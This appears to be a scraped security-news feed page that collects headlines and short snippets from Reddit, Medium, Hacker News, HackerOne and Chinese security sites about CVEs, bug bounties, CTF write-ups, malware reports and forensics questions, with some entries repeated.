I am traveling on the other side of the world. If anyone has a solution / different approach to this, please enlighten me. submitted by /u/Hallowiegehtseuch [link] [comments]
    How to read pcap file with fields which we only want
    SO I have this pcap file with various protocol involved. ex - udp 12:47:22.002149 IP 226.180.77.184.2836 > 173.91.91.209.20208: UDP, length 147 tcp 12:47:22.000371 IP 149.144.16.81.80 > 173.91.91.2.52260: Flags [.], seq 1400:2800, ack 1, win 2049, options [nop,nop,TS val 869951533 ecr 3357690], length 1400: HTTP let's say I need to do find out what is the minimum and maximum bytes for packets. Now I need to only extract the length field from those packets. For easy analyze I can write this into text format. tcpdump -n -r file.pcap -w file.text If I need to only take length field in UPD I can easily cut it like this cat file.text | grep UDP | cut -f8 -d' ' but this doesn't give valid output in tcp or anyother protocol because the Format is not the same. How to read a pcap file in same format/fields. If I can take all the output in fields, the calculation can be easily done. ex- | Time | scrip | destination ip | packet length Can tcpdump or tshark solve this problem. submitted by /u/lowiqstudent69 [link] [comments]
    Information Security freelance
    My sister is working on a small marketing business who creates video modules for big stores. They hire architects, engineers etc. They had a recent incident wherein an architect used the company’s intellectual property to gain a client for himself. They fired the employee and filed a legal complaint. The small business wants to hire an IT Security consultant. As per the IT Security’s assessment, the company only uses Google Drive for storing they’re data. Any recommendation to prevent IP(Intellectual Property) theft? Do you suggest they subscribe to Google Workspace and configure DLP solution? submitted by /u/girlQueso01 [link] [comments]
  • Open

    Cars and cars interiors
    https://tumakina.com/files/ submitted by /u/shaburushaburu [link] [comments]
    Can I post private apis here?
    I have developed niche hobby of finding private apis of different web apps by grokking in devtools. Its pretty simple but I find it very satisfying. Is there a dedicated subreddit where people post such stuff ? This is the closest one I could find but it is related to open directories not apis. In case there isn't a dedicated subreddit, can I post it here instead for people to discuss? submitted by /u/GullibleEngineer4 [link] [comments]
  • Open

    [Writeup]Hacktoria — Operation Runner
    This is the process my team and I took in solving this CTF! Continue reading on Medium »
    15 best and free computer forensic tools
    In this article, I decided to collect programs that will help you in conducting investigations and will be free at the same time. Continue reading on Medium »
    War in Ukraine / April 12
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Decrypt passwords and improve photo quality
    I wanted to share several tools designed to recover passwords or texts hidden by pixels: Depix (https://github.com/beurtschipper/Depix)… Continue reading on Medium »
    Personal security in Telegram investigations
    Let’s talk about personal security measures when conducting investigations in Telegram. They will be useful to you in other online… Continue reading on Medium »
  • Open

    Social Hunter
    Crawls the given URL and finds broken social media links that can be hijacked. Broken social links may allow an attacker to conduct… Continue reading on Medium »
    [2/3] XSS Through The Front-Door @ GitLab
    Sometimes XSS flaws are met with shrugs. They’re an incredibly common vulnerability in web applications even today with so many… Continue reading on Medium »
  • Open

    Citrix SDWAN Hard-Coded Credentials
    submitted by /u/k1dney [link] [comments]
    TallGrass: An AV exclusion enumeration tool written in Python
    submitted by /u/UnwearableCactus [link] [comments]
    Around 50,000 GitHub credentials leaked as metadata inside commits
    submitted by /u/gid0rah [link] [comments]
    OpenSSH 9 released on 2022-04-08. By default it uses NTRU algorithm which is believed to resist attacks enabled by future quantum computers.
    submitted by /u/mstromich [link] [comments]
    A real PoC for CVE-2022-21907 RCE DoS IIS
    submitted by /u/yoursisterboy [link] [comments]
  • Open

    SecWiki News 2022-04-13 Review
    数据科学研究型人才培养的思考与实践 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-13 Review
    数据科学研究型人才培养的思考与实践 by ourren 更多最新文章,请访问SecWiki
  • Open

    Coercing NTLM Authentication from SCCM
    submitted by /u/dmchell [link] [comments]
  • Open

    Critical security vulnerability fixed in Elementor (5M+ WordPress Installs)
    Article URL: https://patchstack.com/articles/critical-vulnerability-fixed-in-elementor-plugin/ Comments URL: https://news.ycombinator.com/item?id=31014804 Points: 1 # Comments: 0
    Remote Procedure Call Runtime Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809 Comments URL: https://news.ycombinator.com/item?id=31012416 Points: 4 # Comments: 0
    Microsoft patches zero-day RCE vulnerability with CVE score of 9.8
    Article URL: https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/ Comments URL: https://news.ycombinator.com/item?id=31012226 Points: 1 # Comments: 0
    Git security vulnerability announced
    Article URL: https://github.blog/2022-04-12-git-security-vulnerability-announced/ Comments URL: https://news.ycombinator.com/item?id=31009675 Points: 523 # Comments: 256
  • Open

    Coercing NTLM Authentication from SCCM
    tl;dr: Disable NTLM for Client Push Installation Continue reading on Posts By SpecterOps Team Members »
    Start learn pentesting/hacking. The Red Team
    Useful materials for those who starting to learn pentesting/hacking. All materials checked by myself. Continue reading on Medium »
  • Open

    Heap Exploitation for Homo sapiens.
    No content preview
    Arming the Use-After-Free()
    No content preview
    ROP Chains on ARM
    No content preview
    Integer Overflows in ARM
    No content preview
    Invoking mprotect() using ROP Chains in ARM
    No content preview
    500$ Bug: Sensitive Data Exposure to Broken Access Control leads, How I able to take over any…
    No content preview
    P1 Vulnerability: How I chained Logical-Error to Account-Takeover Vulnerability ‍that No-One…
    No content preview
    How hackers impersonate email-id’s : Email Spoofing and Phishing Attacks
    No content preview
    How a YouTube Video lead to pwning a web application via SQL Injection worth $4324 bounty
    No content preview
    Android Pentesting Setup On Macbook M1
    No content preview
  • Open

    Heap Exploitation for Homo sapiens.
    No content preview
    Arming the Use-After-Free()
    No content preview
    ROP Chains on ARM
    No content preview
    Integer Overflows in ARM
    No content preview
    Invoking mprotect() using ROP Chains in ARM
    No content preview
    500$ Bug: Sensitive Data Exposure to Broken Access Control leads, How I able to take over any…
    No content preview
    P1 Vulnerability: How I chained Logical-Error to Account-Takeover Vulnerability ‍that No-One…
    No content preview
    How hackers impersonate email-id’s : Email Spoofing and Phishing Attacks
    No content preview
    How a YouTube Video lead to pwning a web application via SQL Injection worth $4324 bounty
    No content preview
    Android Pentesting Setup On Macbook M1
    No content preview
  • Open

    Heap Exploitation for Homo sapiens.
    No content preview
    Arming the Use-After-Free()
    No content preview
    ROP Chains on ARM
    No content preview
    Integer Overflows in ARM
    No content preview
    Invoking mprotect() using ROP Chains in ARM
    No content preview
    500$ Bug: Sensitive Data Exposure to Broken Access Control leads, How I able to take over any…
    No content preview
    P1 Vulnerability: How I chained Logical-Error to Account-Takeover Vulnerability ‍that No-One…
    No content preview
    How hackers impersonate email-id’s : Email Spoofing and Phishing Attacks
    No content preview
    How a YouTube Video lead to pwning a web application via SQL Injection worth $4324 bounty
    No content preview
    Android Pentesting Setup On Macbook M1
    No content preview
  • Open

    【安全通报】2022年4月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年4月 安全补丁,修复了针对 53 款微软产品的 119 个漏洞,其中 47 个权限提升漏洞,47 个远程代码执行漏洞,13 个信息泄露漏洞,9 个拒绝服...
  • Open

    【安全通报】2022年4月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年4月 安全补丁,修复了针对 53 款微软产品的 119 个漏洞,其中 47 个权限提升漏洞,47 个远程代码执行漏洞,13 个信息泄露漏洞,9 个拒绝服...
  • Open

    欧盟官员或已被以色列飞马间谍软件盯上
    据路透社最新报道,欧盟高级官员已被臭名昭著的飞马软件(Pegasus)盯上。
    FreeBuf早报 | Hashnode 博客平台存在LFI漏洞;新黑客盗取价值60万美元的加密货币
    在 ESET 和微软研究人员的帮助下,乌克兰官员表示成功阻止了一起针对能源设施的网络攻击。
    LockBit勒索软件团伙潜伏在美政府网络中数月
    安全研究人员发现,在部署有效载荷之前,一家受到LockBit勒索软件攻击的美国地区政府机构被该勒索软件团伙潜藏在其网络中至少5个月。
    惠普 Teradici PCoIP 受漏洞影响, 波及 1500  万个端点
    Teradici 受到最近披露的OpenSSL证书解析漏洞影响,该漏洞导致无限拒绝服务循环。
    Imperva最新报告,消费者对数据泄露风险日益麻木
    根据Imperva的最新研究,消费者对与他们开展业务的企业的信任处于最低点,导致许多人“放弃”安全性。
    记一次数据包解签名实战
    本文主要介绍寻找签名算法和实现自动化签名的过程。
    暗网市场 RaidForums被一锅端了
    在执法行动中,年仅21岁的RaidForums创始人兼首席行政官亦被逮捕。
    基于机器学习的自动化网络流量分析
    本文关注通用的自动化网络流量分析问题,致力于使研究人员将更多的精力用于优化模型和特征上。
  • Open

    Microsoft patches zero-day RCE vulnerability with CVE score of 9.8
    Article URL: https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/ Comments URL: https://news.ycombinator.com/item?id=31012226 Points: 1 # Comments: 0
  • Open

    余弦:区块链黑暗森林自救手册
    作者:慢雾安全团队 原文链接:https://mp.weixin.qq.com/s/A2XQEWlH25o8YsWjwCz2HQ 前言 区块链是个伟大的发明,它带来了某些生产关系的变革,让「信任」这种宝贵的东西得以部分解决。但,现实是残酷的,人们对区块链的理解会存在许多误区。这些误区导致了坏人轻易钻了空子,频繁将黑手伸进了人们的钱包,造成了大量的资金损失。这早已是黑暗森林。 基于此,慢雾科技...
  • Open

    余弦:区块链黑暗森林自救手册
    作者:慢雾安全团队 原文链接:https://mp.weixin.qq.com/s/A2XQEWlH25o8YsWjwCz2HQ 前言 区块链是个伟大的发明,它带来了某些生产关系的变革,让「信任」这种宝贵的东西得以部分解决。但,现实是残酷的,人们对区块链的理解会存在许多误区。这些误区导致了坏人轻易钻了空子,频繁将黑手伸进了人们的钱包,造成了大量的资金损失。这早已是黑暗森林。 基于此,慢雾科技...
  • Open

    JTAG/Chip-Off Resources
    Hi community… I’m wondering if I can make a DIY lab for JTAG/Chip-Off but stuck at what needs to be the minimum items to have to perform JTAG/Chip-Off … JTAG/Chip-Off is quite similar to Hardware Reverse Engineering … so what would be the useful resources to get started with … Any mentioned article or book or tools would do great … Thanks submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    Exposing Personally Identifiable Information Behind A Recently Leaked Russian High-Profile Cybercriminal Forum Community - An Analysis
    I've decided to share some personally identifiable information behind a recently leaked high-profile Russian cybercrime-friendly forum community with the idea to assist everyone in their current and future cyber attack or cyber campaign attribution efforts.Sample personally identifiable information courtesy of a recently leaked high-profile Russian cybercrime-friendly forum community:djamix@
    It's Full of Secrets and User-Generated Sensitive and Classified Information - An Update on Some Current Projects
    It used to be a moment when "rocking the boat" while travelling was a monthly routine and when sticking to the basic methodology that "sharing is caring" and that "if it's going to be massive it better be good" was the everyday mentality for a new generation of baby boomers who would eventually end up inspiring the next generation Y which is by the way a secret that you should be extremely

  • Open

    Blue team scripts you use on red team engagements?
    I feel like I could do better at reports for clients. Besides shots of hash dumps, cracks, shares, AD trees, etc, I like to run winpeas and screenshot it, but the output is a little long for screenshots. Can anyone recommend any good blue team scripts that offer good output for reports? submitted by /u/hpliferaft [link] [comments]
    Tired of SANS. Any other good training/certification programs?
    I have 7 SANS certs (1 a year) and I get unlimited cloud vendor training/cert attempts from my employer. Any suggestions for non-SANS, and non-Azure/AWS training? submitted by /u/m0lware [link] [comments]
    Are Java updates cumulative from a security standpoint ?
    Hello allo, sysadmin trying to learn some basic security here. Currently am looking at this CVEdetails page on Java vulns, it mentions Java 8 update 311 is vulnerable to a specific vuln. ​ My question is, would java 8u301 be vulnerable as well ? My understanding is: CVEdetails, various advisories and Oracle themselves never explicitly mention that other v8 updates are affected But maybe it's because Java updates fundamentally always are backwards-compatible so it's basically a fundamental given and I missed this info ? ​ I know vuln scans exist and Wazuh,greenbone and openCVE all return simply nothing on this soft but we all know vuln scans are not the perfect holy grail either, I'd rather just know how the hell Oracle approches this. Maybe this better fits r/AskProgramming but since it's more specifically on the security side I start here. ​ Thanks for any answers. submitted by /u/YetAnotherSysadmin58 [link] [comments]
    Open Source tool for code/data leakage
    I'm looking to find open source tools (or low-cost) that can scan common places on the internet where people might upload my company's data accidentally or maliciously. I'm interested in scanning places like github/bitbucket/etc for code, as well as pastebin/other random sites for bulk data. I haven't gotten much farther than google dorks and github searches thus far. Any good tools out there? submitted by /u/tophersmith [link] [comments]
    network forensic analysis challenge
    Hi, I am looking for some Network forensic challenges/puzzles, like getting a .pcap file and try to determine what happened or from which IP and so on.. I founded netresec.com. Lots of pcap there, specially about the MACCDC competitions, but it is not clear to me WHAT is the "challenge", or even if there is one, I mean maybe they provide very realistic pcap files and it is necessary to understand what happened on the wire without any clue at all. any other suggestion? thank you! submitted by /u/g-simon [link] [comments]
    IT Consultant to CyberSecurity Field?
    I am an IT management consultant at one of the biggest shops in the world. Think tier 2.. I am currently an entry level MC working as a trainer with a govt focused cloud architecture. I have close to two years of experience in the field and want to know my prospects for transitioning in the Cyber Security Field; and what types of roles are available to someone transitioning from IT Management Consulting? submitted by /u/nyulspboy [link] [comments]
    Can a webpage access any part of an extension from the browser?
    For example, LastPass the browser extension has the user log in with their master password in the extension window, which can have any webpage loaded in the browser at the same time. Is it possible for a malicious webpage to be able to interact with the extension such that it can read what is being input? What ability if any do web pages have to access extensions in the browser? Is it one way? i.e. Extensions can affect a webpage but not the other way around? Or is the extension model included in the DOM items that a webpage can interact with? submitted by /u/JamieOvechkin [link] [comments]
    No prior knowledge. No It backgroud. About 3 years to learn. Too much to dream?
    So, basically... is it worth pursuing the bug bounty path? I am looking for a side hustle (maybe one day a full job?) and I have around 3 years to spare while maintaining my actual job. Is it feasible? Or would you choose another thing to pursue? *same question asked in the bb subreddit. submitted by /u/_sephi_ [link] [comments]
  • Open

    Earning $$$ without any hacking, Most interesting OTP Bypass
    Want to see how i managed to get OTP Bypass without any hacking ? Give it a shot and read my story! Continue reading on Medium »
    Earning $$$ without any hacking, Most interesting OTP Bypass
    Want to see how i managed to get OTP Bypass without any hacking ? Give it a shot and read my story! Continue reading on InfoSec Write-ups »
    Compromise domain with NoPac exploit
    During the last pentesting in client infra, we compromised a domain with CVE-2021–42287/CVE-2021–42278(noPac) exploits. Continue reading on Medium »
    Euler запускає програму ImmuneFi Bug Bounty на суму 1 мільйон доларів!
    Програма ImmuneFi Bug Bounty має на меті посилити безпеку Euler, одночасно посилюючи співпрацю з більшою екосистемою DeFi в рамках нашого… Continue reading on Medium »
    Broken session control leads to access the admin panel even after revoking the access!! — #ZOHO
    Hey Guy’s Continue reading on Medium »
    CVE-2021–4034
    CVE-2021–4034 Local privilege escalation Continue reading on Medium »
    AlbusSec:- Penetration-List 05 Cross-Site-Scripting (XSS) — Part 3
    Hello Medium folk, I hope you enjoyed our previous articles, so now on this article You’ll learn about Types of Cross-Site-Scripting… Continue reading on Medium »
    Nexus Mutual Community Renews Bounty Matching Program With $600k War Chest
    The Nexus Mutual community has just voted to continue its bug bounty matching program with Immunefi and increase the size of the war chest… Continue reading on Immunefi »
    Immunefi Matching Bug Bounty Program: Renewal and Expansion
    Nexus Mutants recently approved the renewal and expansion of the Immunefi matching bug bounty program by a unanimous vote. Funding for the… Continue reading on Nexus Mutual »
  • Open

    OSINT TOOLS 2022 THE MOST COMPREHENSIVE LIST OF SOURCES FOR THE OSINT SERVICE.
    PROJECT : ADVISOR B&M LLC (NEW PROJECT)! Continue reading on Medium »
    War in Ukraine / April 11
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    Tarrask malware uses scheduled tasks for defense evasion - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]
    Tarrask malware uses scheduled tasks for defense evasion
    submitted by /u/SCI_Rusher [link] [comments]
    Mythic C2 Framework Introduction Video
    Introduction To Mythic C2 - YouTube submitted by /u/luzunov [link] [comments]
    Up to 100k GitHub credentials leaked...
    submitted by /u/dmchell [link] [comments]
    Some insights into offensive security from ex Facebook red teamer
    Recently recorded this podcast with a CTO in cybersecurity (my boss) and a former offensive security engineer at Facebook (currently enterprise architect at ReliaQuest) about red teaming and offensive security. There is some interesting insight into ethical red teaming, internal vs external teams and getting the business on board with the whole process. Give it a listen if you'd like. https://open.spotify.com/episode/1BuzVj8Md3K4O7OAkuHrdM submitted by /u/AgentLessBots [link] [comments]
  • Open

    CVE-2022-22965 – Spring RCE (which does NOT impact spinnaker)
    Article URL: https://www.armory.io/blog/cve-2022-22965-spring-rce-which-does-not-impact-spinnaker/ Comments URL: https://news.ycombinator.com/item?id=31008467 Points: 2 # Comments: 0
    Git v2.35.2 and below for CVE-2022-24765
    Article URL: https://lore.kernel.org/git/xmqqv8veb5i6.fsf@gitster.g/ Comments URL: https://news.ycombinator.com/item?id=31008416 Points: 4 # Comments: 0
  • Open

    Russian Malware Targeting Ukrainian Energy Sector
    submitted by /u/entropydaemon5 [link] [comments]
    The Security Risks of Open Source Dependencies and Some npm Flaws That Leverage Them
    submitted by /u/mkatch [link] [comments]
    Round Two: An Updated Universal Deserialisation Gadget for Ruby 2.x-3.x
    submitted by /u/Gallus [link] [comments]
    CVE-2022-25165: Privilege Escalation to SYSTEM in AWS VPN Client
    submitted by /u/rhino_security_labs_ [link] [comments]
  • Open

    Process Hollowing (Mitre:T1055.012)
    Introduction In July 2011, John Leitch of autosectools.com talked about a technique he called process hollowing in his whitepaper here. Ever since then, many malware The post Process Hollowing (Mitre:T1055.012) appeared first on Hacking Articles.
    Defense Evasion: Process Hollowing (Mitre:T1055.012)
    Introduction In July 2011, John Leitch of autosectools.com talked about a technique he called process hollowing in his whitepaper here. Ever since then, many malware The post Defense Evasion: Process Hollowing (Mitre:T1055.012) appeared first on Hacking Articles.
    Process Hollowing (Mitre:T1055.012)
    Introduction In July 2011, John Leitch of autosectools.com talked about a technique he called process hollowing in his whitepaper here. Ever since then, many malware The post Process Hollowing (Mitre:T1055.012) appeared first on Hacking Articles.
    Defense Evasion: Process Hollowing (Mitre:T1055.012)
    Introduction In July 2011, John Leitch of autosectools.com talked about a technique he called process hollowing in his whitepaper here. Ever since then, many malware The post Defense Evasion: Process Hollowing (Mitre:T1055.012) appeared first on Hacking Articles.
  • Open

    Git Security Vulnerability Announced
    Article URL: https://github.blog/2022-04-12-git-security-vulnerability-announced/ Comments URL: https://news.ycombinator.com/item?id=31006060 Points: 34 # Comments: 11
  • Open

    SecWiki News 2022-04-12 Review
    区块链黑暗森林自救手册 by ourren 从零开始,分析Spring Framework RCE by ourren OLa:一款CS后渗透模块插件 by ourren 美国网络安全意识教育举措概述 by ourren DecoyMini: 智能仿真与攻击诱捕工具 by ourren 等保、分保、关保、密评四道防线守护网络信息安全 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-12 Review
    区块链黑暗森林自救手册 by ourren 从零开始,分析Spring Framework RCE by ourren OLa:一款CS后渗透模块插件 by ourren 美国网络安全意识教育举措概述 by ourren DecoyMini: 智能仿真与攻击诱捕工具 by ourren 等保、分保、关保、密评四道防线守护网络信息安全 by ourren 更多最新文章,请访问SecWiki
  • Open

    Understanding and Defending Against Reflective Code Loading on macOS
    This blogpost will describe the concept of loading executables in-memory on macOS and how to detect it. Continue reading on Medium »
    Home-Grown Red Team: Internal Windows Phishing With Pickl3 And InsideMan
    Let’s assume that you’ve sent your phishing email, found an external RCE exploit that led to internal network access, or whatever method… Continue reading on Medium »
    CrowSec EdTech Write-Up: Poisoning
    In this article, I will demonstrate how to resolve this CTF (Capture the Flag), this challenge is a lab and is available in the CrowSec… Continue reading on Medium »
  • Open

    I made a subreddit for FTP Open Directories.
    I made one so there wouldn't need to be any FTP sites here. ​ r/OpenFTP submitted by /u/ilikemacsalot [link] [comments]
    Notes, Assignments, Question Papers and Study Materials from VMOU (India) [English + Hindi]
    A lot of Study materials, Question papers, Assignments from VMO University, India. Probably left Open on Purpose for students, thus anyone can access. Majority of the content is in Hindi, as well as English, on multiple Subjects/Fields. http://assets.vmou.ac.in/ submitted by /u/amritajaatak [link] [comments]
    Minecraft Mod OD ? (I’m not sure
    Mod for Minecraft kind of interesting OD if anyone wants to try this mod please say if it’s good or not ;) Have fun! https://www.csse.canterbury.ac.nz/greg.ewing/minecraft/mods/SGCraft/doc/Programs/ submitted by /u/Salty_Ad_69 [link] [comments]
    LLOD 04-12-22 (Large List Of Open Directories)
    http://dev.stoneybrooke.com/ https://packages.bic.mni.mcgill.ca/ https://opensource.wandisco.com/ https://www.song.ac.th/song_web58/images/ http://188.165.227.112/ http://www.figuresworld.net/movies_tv/ http://www.cs.cmu.edu/afs/cs/Web/People/libra-demo/ http://www.frontiernet.net/~mardenz/ http://nerfhaven.com/forums/public/style_avatars/ http://tee.tucows.com/ http://tee.linux.tucows.com/ http://www.jeepwrangler.net/ http://ftp.cs.stanford.edu/ http://www.danslagle.com/mac/ http://www.danslagle.com/mac/iMovie/data/ http://www.healthfreedomusa.org/downloads/iMovie.app/ http://www.sfu.ca/~bvaid/ http://test.scripts.psu.edu/users/ http://brbfinanzag.ch/ http://ftpmirror.your.org/ http://ftpmirror.your.org/pub/misc/apple/ https://www.life.illinois.edu/ming/iWeb.app/ http://202.74.40.12/ http://mail.i-sams.com/ ​ Pastebin of both LLODs: https://pastebin.com/QtuNUVry Also don't look at this: http://www.frontiernet.net/~mardenz/Shrek/Shrek.svg submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Counter XSS with Spring Cloud Gateway
    Prerequisites Continue reading on System Weakness »
    Counter XSS with Spring Cloud Gateway
    Prerequisites Continue reading on Medium »
  • Open

    ZAP HUNT Remix
    제가 오랬동안 잘 써오던 도구가 있었습니다. 바로 HUNT인데요! 저 또한 분석하는 방법 중 Data Driven Testing을 선호하는 편이라 HUNT 스크립트를 정말 잘 쓰고 있었습니다. 그러던 중 HUNT Remix라고 하여 ZAP, Burpsuite 에서의 기존 스크립트 방식을 Addon 형태로 변경하는 작업이 있는걸 알게 되었고 저도 이제 HUNT 사용을 AdoOn 형태로 변경하였습니다. 오늘은 HUNT가 뭔지 간략하게 설명드리고, Remix 버전의 Addon을 설치하고 사용하는 방법에 대해 이야기드릴까 합니다. HUNT+DDT 제가 2018년도에 한번 소개해드렸던 도구로 Jason Haddix 가 DEFCON 25에서 발표했던 내용을 위한 도구입니다.
  • Open

    A brief look at Windows telemetry: CIT aka Customer Interaction Tracker - a source of forensic data on at least Windows version till 7
    submitted by /u/digicat [link] [comments]
    Cellbrite free alternatives?
    Hi everyone, is there any free (and hopefully open source) alternative to Cellbrite for Mobile Forensics? submitted by /u/zr0_day [link] [comments]
    A small advice for a first DFIR setup
    I've gotten a lot of questions about my setup for digital forensics and incident response in the last several months, so I decided to start my blog with an article on it. Suggestions and enhancements are always appreciated. https://www.dfirblog.com/yet-another-setup-for-dfir-investigations/ submitted by /u/samaritan_o [link] [comments]
    BSSID and Cell ID values offline database for PA
    Hello, sometimes online Enrichment of BSSID and cell IDs from PA (versions 7.49, and 7.54) fails to me. Does anybody have the full DB for doing this offline, to download it? Also, does anybody know how to use open databases as ALEXANDER MYLNIKOV´s databases or RADIOCELLS.ORG ones? Thanks submitted by /u/PaleAbbreviations648 [link] [comments]
  • Open

    Regular Expression Denial of Service vulnerability
    Reddit disclosed a bug submitted by dingleberryfarts: https://hackerone.com/reports/1538157
    RCE via WikiCloth markdown rendering if the `rubyluabridge` gem is installed
    GitLab disclosed a bug submitted by vakzz: https://hackerone.com/reports/1401444 - Bounty: $3000
  • Open

    IAM Your Defense Against Cloud Threats: The Latest Unit 42 Cloud Threat Research
    We present research highlights and recommendations for defense against cloud threats from Unit 42’s Cloud Threat Report: IAM the First Line of Defense The post IAM Your Defense Against Cloud Threats: The Latest Unit 42 Cloud Threat Research appeared first on Unit42.
  • Open

    FreeBuf早报 | 开源社区提倡加强路由安全性;新加坡实施严格的网络安全许可证制度
    联邦通信委员会应考虑实施全面测试和罚款,以确保互联网服务提供商采取最少的措施来保护全球互联网路由系统免受恶意攻击。
    恶意软件Mirai正积极利用Spring4Shell漏洞
    近日,有研究显示,Mirai恶意软件正在利用Spring4Shell漏洞感染易受攻击的web服务器,并进行DDoS(分布式拒绝服务)攻击。
    福克斯新闻在线曝光 1300 万条敏感记录
    暴露数据中包含大约 1300 万条网络内容管理记录,互联网用户可以随时访问。
    美国VA增加超1亿的网络安全预算,着重落地零信任
    VA要求在2023财年增加超过1亿美元的网络安全预算,并且将特别关注实施零信任预防措施和安全体系。
    匿名者黑客组织入侵俄罗斯文化部并泄露446GB数据
    黑客组织Anonymous入侵了俄罗斯文化部,并通过DDoSecrets平台泄露了来源于文化部的446 GB数据。
    FreeBuf早报 | 微博等多平台公告打击涉疫谣言;开源平台npm抵制俄罗斯开发者
    多家商业网站平台发布公告,对相关违法违规信息及账号进行严肃处置。
  • Open

    DeFi Hack 通关学习
    作者:0x9k 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 DeFi Hack是根据真实世界DeFi中出现的漏洞为模板,抽象而来的wargame。用以提高学习者挖掘、利用DeFi智能合约漏洞的技能[1]。 May The Force Be With You 题目描述 本关目标是从MayTheForceB...
  • Open

    DeFi Hack 通关学习
    作者:0x9k 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 DeFi Hack是根据真实世界DeFi中出现的漏洞为模板,抽象而来的wargame。用以提高学习者挖掘、利用DeFi智能合约漏洞的技能[1]。 May The Force Be With You 题目描述 本关目标是从MayTheForceB...
  • Open

    Deconstructing Programs for Compiler Fuzzing
    Article URL: https://comby.dev/blog/2022/04/11/comby-decomposer-compiler-fuzzing Comments URL: https://news.ycombinator.com/item?id=30998620 Points: 7 # Comments: 0

  • Open

    [Python]: Add Server-side Request Forgery sinks
    GitHub Security Lab disclosed a bug submitted by someonenobbd: https://hackerone.com/reports/1538144
  • Open

    Burp Suite functionality... But in a web browser?
    Is this a thing? I can't install things on my work laptop and some time I just want to check what HTTPS is doing. submitted by /u/pooshitfartcoomer [link] [comments]
    BurpSuite Vuln Help
    Performed a scan using BurpSuite on an app where I work. Got this and not sure what the actual impact is? External Service Interaction (DNS) alert. Port swigger documentation doesn't help. submitted by /u/DoctorPaxel [link] [comments]
    Remote pentesting with a team
    What’s the best way to run a remote pentest where we send a host to the client and have multiple people accessing the host? In the past I’ve used VMware shared devices but that is now depreciated. Any thoughts? Thanks! submitted by /u/yeahivapebro [link] [comments]
    What could be the reason why an SSH server would return back a high byte packet back to a malicious public ip?
    Srcport was 22 and the destport was a high number. But the bytes sent was about 1140 bytes. I have experimented myself before and a failed ssh login normally just records about less than 50 bytes. I don't have access the the ssh logs on the server. What kind of attack will make an ssh server reply back with such a big byte size? submitted by /u/Ecstatic_Constant_63 [link] [comments]
    Decrypting (and formatting) an external HDD when you know the password?
    Hey, so I have no idea if I just bricked my HDD. I encyrpted it using Veracrypt and was able to mount it just fine, until I accidentally forgot to mount it using Veracrypt one day and right clicked on it instead, selected "format". Ever since, I haven't been able to mount it using Veracrypt. How might I go about decrypting and/or formatting it? submitted by /u/856850835 [link] [comments]
    Studying for CompTIA Security+
    Hi, Is anyone here who studied for Security+ and used https://globalcerts.training ? This site comes up everywhere on the web as an ad. submitted by /u/Dodge-Sw [link] [comments]
    Successful virtualization on M1 ARM host and cybersec Linux distros?
    Has anyone had recent success running any cybersec Linux distros as VMs on ARM-based macs? If so, which distro and which virtualization software was used? I see Kali being supported and developed, but was wondering if any others work. Thanks. submitted by /u/cho--e [link] [comments]
    suspected dns hijack, how to go about this?
    Not knowleable in netsec by any means, im studying web dev so i know the basics. i suspect my router's dns has been hijacked, think attacker is serving me a fradulent google.com. i had a shenanigan that made me suspect this, but would not rather go into details as Im trying to keep this post simple. I know it is unlikely someone would go out of their way to do this, but i want to make sure. How can i check that my gateway modem's/devices' dns have not been tampered with? I tried dnsleaktest but just my ISP's nameservers show up. Is it possible that an attacker would be able to prevent the malicious dns from showing up when doing a test like this? Thanks submitted by /u/Far-Veterinarian9464 [link] [comments]
    Phishing email detection, analysis, and response
    Have to admit Phishing email is a top security concern in the company. There are already lots of successful products such as Knowbe4, Cofense, Mimecast, etc. The email vendor has its own phishing tools/solutions, e.g. office 365 defender. I am still seeing new products coming up such as Tessian, abnormal security gaining attractions. Are they solving a new problem or are they still solving the same problem with really a break new solutions? submitted by /u/Calm_Scene [link] [comments]
  • Open

    AWS RDS Vulnerability Leads to AWS Internal Service Credentials
    Article URL: https://blog.lightspin.io/aws-rds-critical-security-vulnerability Comments URL: https://news.ycombinator.com/item?id=30996426 Points: 3 # Comments: 0
    Access control vulnerability in EA exposed sensitive personal data
    Article URL: https://portswigger.net/daily-swig/access-control-vulnerability-in-easy-appointments-platform-exposed-sensitive-personal-data Comments URL: https://news.ycombinator.com/item?id=30991997 Points: 1 # Comments: 0
  • Open

    AWS RDS Vulnerability Leads to AWS Internal Service Credentials
    submitted by /u/freakwin [link] [comments]
    CI/CD Goat - A deliberately vulnerable CI/CD environment (CTF)
    submitted by /u/TupleType1 [link] [comments]
    Semgrep ruleset for C/C++ vulnerability research
    submitted by /u/0xdea [link] [comments]
    Hackers Exploiting Spring4Shell Vulnerability to Deploy Mirai Botnet Malware. This is far from the first time the botnet operators have quickly added newly publicized flaws to their exploit toolset. last year, multiple botnets were uncovered leveraging the Log4Shell to breach susceptible servers.
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Pythonic Malware: Evading Detection with Compiled Executables
    Creating Python executables during an offensive security engagement used to be an effective method of evasion. However, this tactic has… Continue reading on InfoSec Write-ups »
    Hacking Instagram Scammers
    No content preview
    SVG SSRFs and saga of bypasses
    Hi all, hope you are keeping well and staying safe. This blog is about my recent experiences with SVG, HTML to PDF SSRF, and bypasses for… Continue reading on InfoSec Write-ups »
    Server-Side Request Forgery (SSRF) Explained
    No content preview
    Complete Guide To Start Bug Bounty In 2022
    No content preview
    TryHackMe: Blaster
    No content preview
    THM: Attacktive Directory
    No content preview
  • Open

    Pythonic Malware: Evading Detection with Compiled Executables
    Creating Python executables during an offensive security engagement used to be an effective method of evasion. However, this tactic has… Continue reading on InfoSec Write-ups »
    Hacking Instagram Scammers
